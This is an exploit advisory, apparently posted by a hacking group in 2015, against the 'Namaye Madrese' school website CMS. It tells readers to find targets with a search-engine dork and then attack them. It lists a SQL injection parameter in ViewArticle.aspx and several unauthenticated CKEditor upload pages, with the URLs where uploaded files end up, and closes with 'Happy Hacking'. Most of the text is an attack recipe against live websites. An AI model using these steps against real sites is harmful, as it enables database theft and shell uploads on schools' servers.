# Exploit Title : Namaye Madrese CMS Multiple Vulnerability
# Date : 12/27/2015
# Exploit Author : Iran Cyber Security Group
# Discovered By : 0x3a
# Category : Web Application Bugs
# Dork : intext:نمای مدرسه، وب سایت مدارس هوشمند
# Tested On : Windows , Kali Linux
# Home : Iran-Cyber.net
# Proof Of Concept :
# 1) SQL injection:
# First Find Targets By Searching The Dork In Search Engines Like Google,Bing,...
# Then You Can Run Your Sql Injection Attack :)
# Exploit :
# /ModuleDefinitions/NewsArticles/ViewArticle.aspx?ArticleId=[SQL Injection]
# 2)RFU:
Exploit :
# 1) Upload Text File : /Pages/Admin/CKEditor/Documentmanager.aspx
Uploaded File Url : /Repositary/RadEditor/SentDoc/Guest/foldername/x.txt
# 2) Upload Image File : /Pages/Admin/CKEditor/FlashManager.aspx
Uploaded File Url:/Repositary/RadEditor/SentImages/Guest/foldername/filename.jpg
# 3) Upload Flash File : /Pages/Admin/CKEditor/FlashManager.aspx
Uploded Flash Url : /Repositary/RadEditor/SentFlashes/Guest/foldername/filename.swf
# 4) Upload Media File : /Pages/Admin/CKEditor/MediaManager.aspx
Uploaded Media Url : /Repositary/RadEditor/SentMedia/Guest/foldername/filename.mp3 or filename.mp4
#############
##Happy Hacking##
#############
------------------------------
Website : Iran-Cyber.Net
# Thanks To : root3r | MOHAMAD-NOFOZI | JOK3R | Pi.Hack | Mr.Turk | WH!T3 W01F | 0day | Saiber89 And All Members Of Iran-Cyber.Net